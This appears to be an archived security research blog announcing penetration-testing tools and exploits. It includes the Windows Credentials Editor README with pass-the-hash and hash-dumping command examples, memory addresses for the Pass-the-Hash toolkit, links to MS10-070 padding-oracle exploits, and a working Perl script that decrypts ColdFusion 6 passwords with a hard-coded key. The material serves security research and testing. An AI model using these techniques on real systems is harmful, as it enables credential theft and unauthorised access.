HEXALE (security & reverse engineering)

WCE v1.2 64-bit version released

2011-08-23T10:46:00.000-03:00

You can find the 64-bit version of WCE v1.2 here

As always, all feedback is welcome, email me.

Thank you!

"Post-Exploitation with WCE" Presentation

2011-08-17T14:15:00.000-03:00

This presentation describes the techniques WCE brings to penetration testers and how these can be used in different scenarios. Although originally targeted to college students studying information security, you might find useful information you didn't know about even if you are an experienced user of WCE or penetration tester.

Direct links:
Post-Exploitation with WCE (SPANISH)

Post-Exploitation with WCE (ENGLISH)

Windows Credentials Editor (WCE) FAQ released

2011-08-03T23:19:00.000-03:00

I find myself answering a lot of questions about WCE and related matters all the time; for this reason I decided to create a WCE FAQ to try to provide a centralized source of information and answers to all the questions.

You can find it here http://www.ampliasecurity.com/research/wcefaq.html

The FAQ is still work in progress and I will continue to update it regularly with new information, attack scenarios, different ways to use the features provided by the tool, etc.

If you have a question in particular that you want answer, please don't hesitate to contact me, I'll answer you personally and also add the question and answer to the FAQ.

Windows Credentials Editor (WCE) v1.2 released

2011-04-18T11:42:00.004-03:00

Windows Credentials Editor v1.2

New features in this version:
-g              Generate LM & NT Hash.
                Parameters: <password>.
-K              Dump Kerberos tickets to file (unix & 'windows wce' format)
-k              Read Kerberos tickets from file and insert into Windows cache

Description:
Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems.

WCE v1.2 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Dumping Kerberos tickets and adding them to the Windows cache was tested on Windows 7; your feedback is welcome.

Download:
http://www.ampliasecurity.com/research/wce_v1_2.tgz

RootedCON 2011 "WCE Internals" presentation available at slideshare

2011-03-09T06:58:00.000-03:00

Check out my presentation on "WCE Internals" (based on WCEv1.1) available at slideshare (posted by RootedCON):

http://www.slideshare.net/rootedcon/hernan-ochoa-wce-internals-rootedcon-2011

I'll publish the .pdf on http://www.ampliasecurity.com/research/ next week.

You can find all the RootedCON 2011 presentations here:

http://www.slideshare.net/rootedcon/

Some presos are in Spanish and some in English.

Go check them out!

WCE v1.1 is out!

2011-03-07T10:12:00.000-03:00

WCE v1.1 is out!

http://www.ampliasecurity.com/research/wce_v1_1.tgz

README:

Windows Credentials Editor v1.1
(c) 2010, 2011 Amplia Security, Hernan Ochoa
written by: hernan@ampliasecurity.com
http://www.ampliasecurity.com
-------------------------------------------------------------

Abstract
----------
Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks.

WCE v1.1 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Supported Platforms
-------------------
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008

Requirements
-------------
This tool requires administrator privileges.

Options
--------
Windows Credentials Editor provides the following options:

Options:
    -l        List logon sessions and NTLM credentials (default).
    -s        Changes NTLM credentials of current logon session.
            Parameters: :::.
    -r        Lists logon sessions and NTLM credentials indefinitely.
            Refreshes every 5 seconds if new sessions are found.
            Optional: -r.
    -c        Run in a new session with the specified NTLM credentials.
            Parameters: .
    -e        Lists logon sessions NTLM credentials indefinitely.
            Refreshes every time a logon event occurs.
    -o        saves all output to a file.
            Parameters: .
    -i        Specify LUID instead of use current logon session.
            Parameters: .
    -d        Delete NTLM credentials from logon session.
            Parameters: .
    -a        Use Addresses.
            Parameters:
    -f        Force 'safe mode'.
    -v        verbose output.

Examples:

    * List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

    * List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
        LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
        LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
        LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
        LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
        LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
        LUID:000003E4h
\:NTLM
        LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
        LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

    * Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Och
oa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

    * Run WCE indefinitely, waiting for new credentials/logon sessions.
    Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

    * Run WCE indefinitely, waiting for new credentials/logon sessions
    Refresh is every 5 seconds by default.

C:\>wce -r

    * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5

GETLSASRVADDR.EXE
-----------------
This tool can be used to obtain automatically needed addresses for WCE
to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the
"Debugging Tools for Windows" package.

Amplia Security at H2HC Cancun

2010-12-28T13:35:00.000-03:00

Amplia Security at H2HC Cancun :)

Contributing author of Hacking Exposed Web Applications 3rd. Edition

2010-10-30T14:19:00.001-03:00

Shamless plug alert!

Hacking Exposed Web Applications 3rd. Edition is out! and I'm a contributing author! Check it out!

http://www.amazon.com/HACKING-EXPOSED-WEB-APPLICATIONS-3/dp/0071740643/ref=sr_1_1?ie=UTF8&qid=1288459138&sr=8-1

MS10-070 ASP.NET Auto-Decryptor File Download PoC exploit

2010-10-20T12:39:00.000-03:00

This is another exploit part of the MS10-070 saga :)

It is not the same as our other previously released exploit, this one uses another information leak. On average, this exploit should allow you to do the same as the previous one but faster (which is important/desirable in this scenario).

You can find it here:
http://www.ampliasecurity.com/research/aspx_ad_chotext_attack.rb

MS10-070 ASP.NET Padding Oracle attack PoC exploit video

2010-10-14T22:42:00.000-03:00

Yesterday, Agustin Azubel from Amplia Security released a proof-of-concept exploit implementing a Padding Oracle attack against ASP.NET (MS10-070) that allows an attacker to download a file from the remote web server.

Today we released a video showing how the PoC exploit works.

You can find it here:
http://vimeo.com/15856549

and also, here:
http://www.youtube.com/ampliasecurity#p/u/0/2jvmT5lmIIM

If you don't feel like installing IIS/ASP.NET and creating a sample application or don't have an already vulnerable ASP.NET application to test the PoC exploit on, the video will give you an idea on how the exploit works.

MS10-070 ASP.NET Padding Oracle Attack to download web.config or other files

2010-10-13T15:31:00.000-03:00

You can find it here:

http://www.ampliasecurity.com/research/aspx_po_chotext_attack.rb

A proof-of-concept attack against MS10-070, this PoC is an implementation in Ruby of a Padding Oracle attack and allows you to download the 'Web.config' file or any other file from a vulnerable ASP.NET installation.

It was written by Agustin Azubel (aazubel [ at ] ampliasecurity.com).

Windows Credentials Editor v1.0 (WCE)

2010-10-08T20:13:00.000-03:00

I just released a new tool called Windows Credentials Editor 1.0 (WCE)

It allows to perform pass-the-hash and other things related to windows logon sessions and supports XP,2003,7,2008 and Vista.

You can find it here:
http://www.ampliasecurity.com/research/wce_v1.0.tgz

Have fun!

A Padding Oracle Attack Implemented in Javascript

2010-09-28T14:11:00.000-03:00

A Padding Oracle Attack implemented in javascript by Agustin Azubel:

http://www.ampliasecurity.com/blog/2010/09/28/a_padding_oracle_attack_implemented_in_javascript/

Transferring files on isolated remote desktop environments Turbo Talk

2010-09-28T10:23:00.000-03:00

The slides for the turbo talk "Transferring files on isolated remote desktop environments" I presented at Ekoparty are up for download here: http://www.ampliasecurity.com/research/transferringfilesonisolatedRDenvironments-ampliasecurity.pdf

The GUI Transfer Toolkit v1.0 can be downloaded here: http://www.ampliasecurity.com/research/gtt_1.0.tgz

And also three videos are available to give you an idea of what the tools do:

Go to: http://www.youtube.com/user/AmpliaSecurity

or, for the individual videos:

"Using GTT to upload files to an isolated Citrix environment"
http://www.youtube.com/watch?v=h65Yz5n1CPw

"Using GTT fastupload to upload files to an isolated Citrix environment"
http://www.youtube.com/watch?v=gLRGuHpvYBI

"Using GTT to download files from an isolated Citrix environment"
http://www.youtube.com/watch?v=asRpCcVhnuI

Thank you!

Comments on "Assessing the risk of the February Security Bulletins"

2010-02-12T22:00:00.002-03:00

I just read the "Assessing the risk of February Security Bulletins" blog post here http://blogs.technet.com/srd/archive/2010/02/09/assessing-the-risk-of-the-february-security-bulletins.aspx

I have some quick comments about the "SMB NTLM Weak Nonce" vulnerability we released and MS' risk assessment:

The blog post says:"Likely to see working proof-of-concept in next 30 days for CVE-2010-0231 resulting in attacker luring remote victim user to open file on attacker server and initiating a connection back to machine where remote victim is logged on. "

We released fully working proof-of-concept code in our advisory (for two different 'approaches' to exploit the vulnerability) the same day the patch was released, so PoC is already available.

MS calls this issue an 'Elevation of Privilege' vulnerability and 'Important'

(also mentioned here: http://blogs.technet.com/srd/archive/2010/02/09/ms10-006-and-ms10-012-smb-security-bulletins.aspx)

I discussed this with MS; they had their reasons which I understood but I disagree.

I'm not convinced this should be categorized as a 'remote code execution' vulnerability either, because strictly speaking.. it is not..

(although it can definitely be used to execute code remotely using DCE/RPC without user interaction, just change the PoC to, instead of creating a text file, do something similar to 'psexec', create exe+register service+start service=code execution. Code to do this is already available in metasploit. I'm going to release an improved version of the PoC with these changes, but you can easily do it yourself).

But, I feel 'Elevation of Privilege' is a term better suited to cases where you have some kind of access level (e.g.: regular user) and then you are able to *elevate* your privileges (.e.g.: you become an admin).

In this case you have no access.. and then you have access..

Following the same logic, a remotely exploitable buffer overflow (remote code execution) would also be an 'elevation of privilege' vulnerability.. :) you don't have access.. you exploit, now you do!..

Anyways... I understand it is perhaps hard to just pick the right 'class' for this vulnerability, and frankly, it doesn't matter..

I just want to say that if you are dismissing applying this patch because it is only an 'Elevation of privilege'.. and because http://blogs.technet.com/srd/archive/2010/02/09/ms10-006-and-ms10-012-smb-security-bulletins.aspx says that the severity of the four vulnerabilities included in ms10-012 is 'Important'.. I ask you to reconsider... :)

Anyways, like I said, 'Important' *should* be enough to convince you to apply the patch.. but just in case..

Also some comments about this vulnerability and Windows NT4:

if you still have some Windows NT 4 boxes on your network and they're accepting NTLMv1 auth requests and other Windows NT 4 boxes acting as clients are initiating authentication attempts using NTLMv1, your network might be vulnerable to replay attacks without any kind of user interaction. It *might* be possible for an attacker to passively sniff network traffic, collect challenges/responses, and then start making connections to the server until a previously observed challenge is returned and at that point return the corresponding response (to increase the feasibility of the attack, it will be a good idea to capture several challenge/response sessions, not just one.. :).. in fact, you could do more sophisticated attacks..)

This scenario is described in the advisory, but since Windows NT 4 is no longer supported by Microsoft, there's no patch. You'll need to do something else, like disabling incoming NTLMv1 auth attempts in Windows NT4 servers (if possible).

Windows SMB NTLM Authentication Weak Nonce Vulnerability released

2010-02-12T21:34:00.003-03:00

In case you didn't catch it on bugtraq or full-disclosure or twitter :), please take a look at the advisory for Windows SMB NTLM Authentication Weak Nonce Vulnerability:

http://www.hexale.org/advisories/OCHOA-2010-0209.txt

It's basically a 14/17-year old vulnerability in the Windows implementation of the NLTM Authentication protocol... goes back to the Windows NT 4 days!

I´ll do a post later commenting on some of, what I think, are the most interesting and important facts said in the advisory that perhaps you didn't catch when reading it or were not clearly described.

Thank you!.

How to decrypt Coldfusion v6 datasource passwords

2009-10-22T11:56:00.003-03:00

Some time ago I made a blog post about how to decrypt datasource passwords for both coldfusion v7 and v8 (see http://hexale.blogspot.com/2008/07/how-to-decrypt-coldfusion-datasource.html), this blog post is basically about the same but for ColdFusion v6.

DataSource passwords in v6 are stored in \lib\neo-query.xml as they were in v7, but this time the passwords are encrypted using a 16-bytes hard-coded key using the TwoFish encryption algorithm.

The code used to encrypt the passwords can be found in cfusion.jar, unzip the .jar file and look for it in \coldfusion\sql\TwoFishCryptor.class and \coldfusion\sql\TwoFish_Algorithm.class.

I wrote a quick perl script to decrypt these passwords (it requires Crypt::TwoFish which you can easily download using CPAN or manually), here it is:

# ColdFusion 6 neo-query.xml database passwords decryptor
# (c) Hernan Ochoa (hernan@gmail.com)

use Crypt::Twofish;

$key = "\x56\xbc\xca\x37\x94\x81\xa6\x17\x09\x59\xfa\xdb\xcc\xfd\x40\x1a";

print "ColdFusion 6 neo-query.xml database passwords decryptor\n";
print "by Hernan Ochoa (hernan\@gmail.com)\n\n";

if (($#ARGV+1) != 1) {
print "syntax: decryptcf6.pl \n";
print "example: decryptcf6.pl AABBCCDDEEFF00010203040506070809\n";
print "\n";
exit 0;
}

$data = @ARGV[0];
if ( length($data) != 32 ) {
print "ERROR: encrypted password must be 32-characters long!\n";
exit 0;
}

print "encrypted password: $data\n";

@chars = split '', $data;

$mybytes = "";

for( $i=0; $i<32; $i=$i+2) {
$mybytes = $mybytes . chr( ( hex(@chars[$i])*16 ) + hex( @chars[$i+1]) );

}

$cipher = Crypt::Twofish->new($key);

print "decrypted password: " . $cipher->decrypt($mybytes);
print "\n";

You can also download it here: http://www.hexale.org/tools/decryptcf6.tgz

List of Addresses for the Pass-the-Hash toolkit -a switch

2009-10-21T11:44:00.003-03:00

Many people contact me frequently asking for the correct addresses to use with the -a switch of whosthere.exe and iam.exe for different versions of Windows, languages, etc.

Although I will continue answering these questions, I have put together a list of addresses for different versions of lsasrv.dll to make the process a little bit easier both for me and for you.

The list currently contains a low amount of addresses but It will grow eventually, your contributions are very welcome but please send me your lsasrv.dll along with the addresses because I need to verify the addresses are correct.

The file containing the list of addresses is very simple:

'sha1' is the sha1 hash of the lsasrv.dll. This is used to identify different versions of the DLL

'File version' and 'Language' are the version and language of lsasrv.dll

'addresses' are the addresses to use with the -a switch

So, basically, if you have a version of windows where whosthere.exe and iam.exe are not working, first try iam-alt.exe and whosthere-alt.exe, if that doesn't work or if you want to specifically use whosthere.exe and iam.exe calculate the sha1 hash of your lsasrv.dll file (located in c:\windows\system32\lsasrv.dll) and look it up in the list of addresses.

If you can't find it there, just email me your lsasrv.dll. I'll answer with the correct addresses and will add them to the list.

You can find the list of addresses here: http://www.hexale.org/pth/pth_addrs.txt

fix for whosthere/iam under XP SP3 with latest updates (May 2009)

2009-05-09T10:28:00.003-03:00

In my last post I mentioned whosthere/iam were not working anymore with the latest updates for xp sp 3 (but iam-alt/whosthere-alt were still working).

Ok, I actually forgot I had added the -a switch to the tools to easily overcome this scenario :).

The only thing you have to do is load lsasrv.dll into IDA and run the passthehash.idc script included in the toolkit's source package and it will give you back the addresses you need to make whosthere/iam work.

For xp sp3 english with the latest patches the values are the following:

75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

so, just run

whosthere -a 75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

or

iam.exe [other options...] -a 75753BE0:7573FDF4:757D0C98:757D0CA0:757CFC60:757CFE54

and both tools will work with the latest patches on xp sp3 english.

If you have a different version of windows just use the IDA .idc script or email me.

whosthere/iam not working with latest xp sp3 patches

2009-04-29T15:44:00.002-03:00

Just wanted to give you a heads up:

whosthere.exe and iam.exe seem to not be working with all the latest patches for xp sp3 applied. Can't really say which patch caused the problem and it doesn't matter that much anyways.

The problem is apparently that the tools just can't find the memory addresses they need, based on which I assume fixing the issue is simply a matter of modifying the heuristics used to find these addresses. I'm already looking at this issue and will release a new version soon.

Meanwhile, the '-alt' versions of the tools (whosthere-alt.exe and iam-alt.exe) still work; so, if you encounter yourself with this problem, just use the -alt versions.

As always, feel free to email me if you have any other questions/problems.

Netifera Video - The Java Virtual Machine As Shellcode

2009-04-07T11:09:00.003-03:00

Check this out, netifera is getting interesting:

"In this screencast we're going to look at some features we are working on for the next version of netifera.

The two main things we're going to demonstrate are geographical visualiation and the netifera probe which is a deployable software agent that makes it possible to run all netifera platform tools remotely as easily as running them locally.

We're going to install the probe on the netifera.com webserver, and we'll deply it like shellcode by injecting it directly into memory over the network, using an exploit".

The video and more information is available at:
http://blog.netifera.com

direck link to the video:
http://blog.netifera.com/video-the-java-virtual-machine-as-shellcode/

Netifera v1.0 released!

2009-03-27T21:15:00.002-03:00

Check out the new version of Netifera! v1.0 has been released!.

Next is a description of the new features of this release:

Netifera is a new modular open source platform for creating network
security tools. This project provides many advantages for both
security developers and researchers who want to implement new tools as
well as the community of users of these tools.

http://netifera.com/download

Tools

* Full IPv6 support
* TCP and UDP network scanning
* Service detection
* Operating system identification
* Reverse DNS scanning
* DNS name brute forcing
* DNS zone transfer information gathering
* Geographical information about network addresses
* Authentication brute force attack (against HTTP, FTP,IMAP and POP3)
* Web crawler discovers applications, collects email addresses and
adds the site structure to the model
* Integrated terminal for connecting to and interacting with network services

Passive Tools

* Modular packet capture service
* Capture packets on multiple interfaces simultaneously
* Parse ’pcap’ format capture files as input to sniffing modules
* HTTP traffic analysis
* DNS information gathering from captured responses
* Network stack fingerprinting
* Service detection from captured banners and protocol packets
* Client application detection
* Credential sniffing for many protocols

Data Model

All information discovered by the netifera platform is persistently
stored in a workspace database. Our extension design allows for
developers to easily create their own data types and integrate them
into the platform.

User Interface

The platform provides an intuitive and professional quality graphical
user interface for using the tools written for our platform and
navigating the information they produce. Different tasks in our
application such as sniffing information from the network, or actively
collecting information by scanning networks, or exploring the local
environment of a remotely deployed probe (coming soon! ) each have a
specialized configuration of the user interface called a ’perspective’

Programming API

The netifera platform brings together high quality programming APIs
for tasks such as:

High performance asynchronous socket connection and communication
Link level packet capture and raw socket injection
802.11 monitor mode packet capture and injection (coming soon! )
Network protocol header construction and analysis (ethernet, ip, tcp, etc...)
Application layer protocol libraries (http, dns, ftp, etc...)

Download netifera 1.0 for LInux and Mac OS X from:

http://netifera.com/download

* Important * Remove older versions before installing
If you have any previous version installed, you must delete the entire
directory (or move it out of the way) before installing this version.
This version is not compatible with the workspaces created with
previous beta versions so you should remove the .netifera folder from your home
directory (rm -rf ~/.netifera)

Contact us
We need your feedback to improve netifera. If you have bugs to report,
trace backs, screen captures of failures, .log files, or comments
about anything that annoys you while using netifera send them to:

bugs@netifera.com

Thank you!

Microsoft wants to listen to music with me

2009-01-23T16:55:00.005-02:00

I just installed Windows 7 Beta, I run Windows Media Player for the first time and I get the following dialog:

The default option is 'Recommended Settings' but I notice that it says 'send usage data from the Player to Microsoft' and I go 'nah..' and choose 'Custom settings' because it says 'Customize privacy,..'

I click 'Next' and the following dialog appears:

But mhmmm....I can't uncheck the 'I want to help make Microsoft software and services even better by sending Player usage data to Microsoft'...

I like it how they try to sell it to you... 'come on! help Microsoft make this software even better! helping is good! help! if you help you're a good person! heeeeeeeelp!' ...

I guess this is a 'conditioned' beta, you get to play with the software but only if you are willing to 'help'.. :) which is good, right? :)

It's a silly thing anyways, but I thought it was funny.

Firefox and client certificates: a privacy issue

2008-12-23T15:24:00.005-02:00

There's something disturbing in the way Firefox handles client certificates in some situtations; in fact I just sent an email to Mozilla Security a few days ago and the person who answered me verified they knew about it and in fact they had issued an advisory some time ago, but it seems I missed it, so my bad.

This person kindly provided me the following links which are very informative:

discussion of the bug behind the behaviour:
http://www.mozilla.org/security/announce/2008/mfsa2008-17.html

An article that attemps to describe the algorithm used by Firefox for picking the cert and ways to improve it
http://www.mozilla.org/security/announce/2008/mfsa2008-17.html

developers newsgroup where you can talk about certificate issues:
http://news.mozilla.org/mozilla.dev.tech.crypto

There're still things, in the last article specially, that I think do not match what happens in reality, but oh well.. maybe in some other post, I still need to check some things before saying anything more.

Thanks to Mozilla Security for their prompt response and the links.

So, here's the thing:

Let's assume you use client cerficates for some web sites and you have imported them into Firefox.

By default, if a remote https server requires client certificates, Firefox is setup to display a dialog box listing the certificates you have in Firefox's certificate store and let you choose which one to present to the remote https server.

This is the default option and can be found in the Edit->Preferences->Advanced->Encryption Tab under 'Certificates' (or Tools->Options->Advanced->Encryption if you're running Windows).

The option is called 'Ask me every time'.

The problem with using this option is that sometimes with some web servers, Firefox will ask you again and again and again which certificate to use. For example, if you're using VMWare server and accessing it thru the web interface, you'll have this problem.

According to the person I 'talked' to at Mozilla Security this is because the servers are misconfigured, do not cache the SSL session and re-request the certificate on every connection; which sounds reasonable (I think).

The thing is that, in these situations, it is impossible to keep the 'Ask me every time' option enabled.. having the 'choose certificate' dialog appearing every 2 minutes while you're trying to do somethings drives you crazy..

I'm not saying it is Firefox's fault , I'm saying it's just impossible to keep that option enabled in these cases.

So, what can you do? You can go and change the option to be 'Select one automatically'.

Doing that will solve all your problems, the dialog asking for which certificate to use will not appear any more because Firefox will choose one for you.

THE THING IS... Firefox's algorithm to choose which certificate to send is not very good.. to tell you the truth I have no idea exactly what's the algorithm they use (the information found in the link I mentioned above was not enough for me to understand exactly how it works).. but from what I've seen in practice.. it is very bad..

Because of this, situations like the following can occur:

* You have a client certificate for the Organization 'Organization A' stored in the Firefox certificate store

* You connect using https to www.organizationb.com (or any other domain, www.whatever.com, just one that has absolutely NOTHING to do with the organization that provided you with the client certificate :)). This https server requires client certificates.

* if you have the 'Select one automatically' option enabled, it is very likely that Firefox will send the client certificate for 'Organization A' to this unknown, untrusted, arbitrary https server (specially if this is the only client certificate you have).

* This all happens transparently, you'll never know it happened.

So... this is not very good.. it's a privacy issue.. client certificates usually contain email-addresses, the name of organizations, YOUR NAME, YOUR EMAIL ADDRESS,... you get the idea..

So, if you have the 'Select one automatically' option enabled, anyone on the Internet can potentially know your name, your organization's name, your e-mail address.. not very good.. and it all happens behind the scenes.

So, again, using 'Select one automatically'... not a very good idea.. :)

If you use client certificates, you can also create a 'fake' certificate without any personal information and hope Firefox will deliver that one to the remote server. I tried this and it works, but I haven't yet thoroughly analyzed the algorithm they use to choose which certificate to send to be able to to tell you how to create it and whether a remote server can still make Firefox send your other certificates.

So let me repeat again, 'Ask me every time' is the default option in Firefox (this is very important), however, sometimes, as I explained before, having this option enabled is not possible (yes, the scenarios are limited, but they exist), so.. in these special cases.. I recommend having a 'fake' cert or enabling 'select one automatically' and then be sure not to access any other web server :) (not browsing only https servers is not enough, think redirect.. ) until you change the setting back to 'Ask me every time' :).

if you want to try this out, you can use openssl:

* Enable 'select one automatically' if you haven't enabled it already
* create a fake server certificate to use with openssl
* run the following command: sudo openssl s_server -accept 443 -cert server.crt -key server.key -crl_check -verify -state -HTTP (or change -accept 443 to -accept to avoid running openssl as root.. it's just a test anyways.. )
* go to your browser and access https://localhost/something
* the client certificate information will be displayed by openssl

See the next screenshot:

* you can also add the -debug parameter to openssl if you want to obtain more verbose information
* you can also use ruby and WEBrick (you won't have to create a fake server certificate); or any other scripting language :)

So, there're many improvements that could be done to the 'Select one automatically' option (some are very naive and are mistakes :)).. so be careful..

Netifera beta2 released

2008-12-12T10:19:00.000-02:00

Netifera just released beta2. check it out: http://blog.netifera.com/beta-2-released/

I really like where this tool/framework is going. If you're a consultant or something like that :), and you wanted a very good framework, with a nice GUI, nice plugin architecture, oriented towards data gathering, passive and active network discovery, creating associations between discovered entities, and more, you have to check out this tool.

Of course, it is still in beta, and lots of things need to be added, improved, fixed; but anyways, like I said, I really like the direction the tool is taking.

MS08-068 - anti-smbrelay?

2008-11-13T10:05:00.000-02:00

Ok, this is kind of a lame post because I'm gonna give you links to posts made by other people, but oh well, I felt like sharing what I'd found and I'm posting links and not reposting anything, so it should be fine :).

I was looking for information about how MS08-068 tried to prevent the smbrelay attack (or "SMB credentials reflection attack" as MS likes to call it) and the best post I found was this one from metasploit's blog:

http://blog.metasploit.com/2008/11/ms08-067-metasploit-and-smb-relay.html

I also find interesting the following posts:

http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx

http://blogs.technet.com/msrc/archive/2008/11/11/ms08-068-and-smbrelay.aspx

Anyways, I haven't verified any of the things said in these posts, so "trust, but verify".

HITB2008 - Malaysia - Pass-The-Hash Toolkit for Windows Presentation

2008-11-03T07:16:00.002-02:00

Hey, so I'm back from Malaysia!.
Great place, very interesting, I need to go back as soon as possible :).

Thanks to Dhillon for the opportunity to present in the conference and going to Malaysia, and the entire HITB Crew for your help during the conference. Special Thanks go to Fabian, a HITB Volunteer, that waited for me at the airport at 6:20am to send me on my way to the Hotel. Thanks Fabian! :).

Materials for the conference are available here:

http://conference.hackinthebox.org/hitbsecconf2008kl/materials/

My presentation, "Pass-the-hash toolkit for Windows - Implementation & Use" is available here:

http://conference.hackinthebox.org/hitbsecconf2008kl/materials/D1T1%20-%20Hernan%20Ochoa%20-%20Pass-The-Hash%20Toolkit%20for%20Windows.pdf

The presentation is a good starting point to understand how the tools were implemented, and will also give you an insight on how to use the tools and why.

The presentation does not describe exactly the demo I did where I reproduced (as a single example of this situtation) a 'vulnerability' where NTLM credentials remained in memory after users log off, which is also one of the best arguments in favor of using the whosthere/whosthere-tool during a pentest, but it shouldn't matter anyway because I just reproduced the 'bug' to show the audience I was not lying about this issue :), so being able to reproduce it (the case I showed at least) should not be relevant; the only relevant thing is: you should use whosthere/whosthere-alt during pentests to gather admin credentials of past logons that are in memory :).

bug in iam-alt makes it fail completely (easy to fix)

2008-10-22T12:28:00.004-02:00

Thanks to 'nop' that posted this question in the hexale forums I've found a bug in iam-alt.c that makes it fail miserably every single time :). my bad.

So, if you're having issues with iam-alt.exe where you pass to it a hash, and it says it has successfully changed it in memory, but then you run whosthere/whosthere-alt and the hash you see is nothing like the original hash you provided to iam-alt.exe the source of this issue is this bug.

the bug is very easy to fix, if you want to fix it yourself, you just need to modify the following:

In pshtoolkit_v1.4-src\iam-alt\iam-alt.c:

line 332:
change
memset(nums, 'x00', 3);
for
memset(nums,'\x00',3);

line 337:
change
memset(nums, 'x00', 3);
for
memset(nums,'\x00',3);

and that's it! (feel free to modify the memset() call to include your desired representation of the byte value 0 :))

This fix is gonna be included in the next release; if you're in a hurry and for some reason want to fix this immedately and cannot re-compile the tool by yourself, drop me an email and I'll send youthe fixed version of iam-alt.exe.

I'm giving twitter a try

2008-10-09T23:34:00.000-03:00

I'm giving twitter a try,

http://www.twitter.com/hernano

WifiZoo and the new version of scapy

2008-10-09T16:13:00.003-03:00

The current version of Wifizoo does not work with scapy's latest version (http://www.secdev.org/projects/scapy/files/scapy-latest.zip), you'll get the following error when running wifizoo:

Traceback (most recent call last):
File "wifizoo.py", line 48, in
conf.verb = 0
NameError: name 'conf' is not defined

To fix this error do simply the following:

Look in wifizoo.py for the line that says 'import getopt' and after that add the following line:

from scapy.all import *

and now everything should work again.

How to store AddressBook data on an encrypted volume

2008-08-24T02:22:00.004-03:00

Ok, i'm paranoid and I did the following to store the data of OS X's AddressBook on an encrypted DMG volume. Using this method I know all data in my addressbook is unencrypted and available only when I want it to be unencrypted (that is, only when I mount the encrypted DMG volume).

This is nothing great or difficult, is actually pretty dumb, but I thought perhaps someone out there will also find it useful:

1.I assume you already have your DMG encrypted volume or TrueCrypt image or whatever you use created; let's say you mount it at /Volumes/encdisk
2.AddressBook data is stored in ~/library/ApplicationSupport/AddressBook
3.Move everything in ~/library/ApplicationSupport/AddressBook to /Volumes/encdisk/AddressBook
4.rm -fr ~/library/ApplicationSupport/AddressBook
5.ln -s /Volumes/encdisk/AddressBook/ AddressBook

and that's it :)

If your encrypted DMG/TrueCrypt volume is not mounted and you launch AddressBook,, it will of course start executing and will then terminate immediately, which is great! :)

DISCLAIMER: Do this at your own risk; I cannot be held responsible if following this instructions destroys all your data.

wifizoo.hexale.org - WifiZoo's new web site

2008-08-06T22:56:00.003-03:00

Wifizoo has a new web site completely dedicated to the tool.

Yes, it is still ugly and basically contains the same info as the old one, but I'm going to change that as soon as possible.

For starters, there's a 'News' section that right now is basically a bunch of items inside a <li> tag :), but this section contain several pieces of information that were scattered on different web sites and my inbox up until now.

The idea is to gather all information regarding Wifizoo in wifizoo.hexale.org making it the place to go when searching for information about the tool.

To all of you who have sent me links to videos and tutorials about wifizoo, please, can you send them again? I'll go thru my inbox, but I don't want to miss any, so, if you are still interested, please resend me the link to the tutorial/video/etc so I can add it to the web site.

And remember there's a Wifizoo forum at www.hexale.org/forums.

Release of Pass-The-Hash Toolkit v1.4

2008-07-02T15:45:00.001-03:00

Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz

Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz

Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
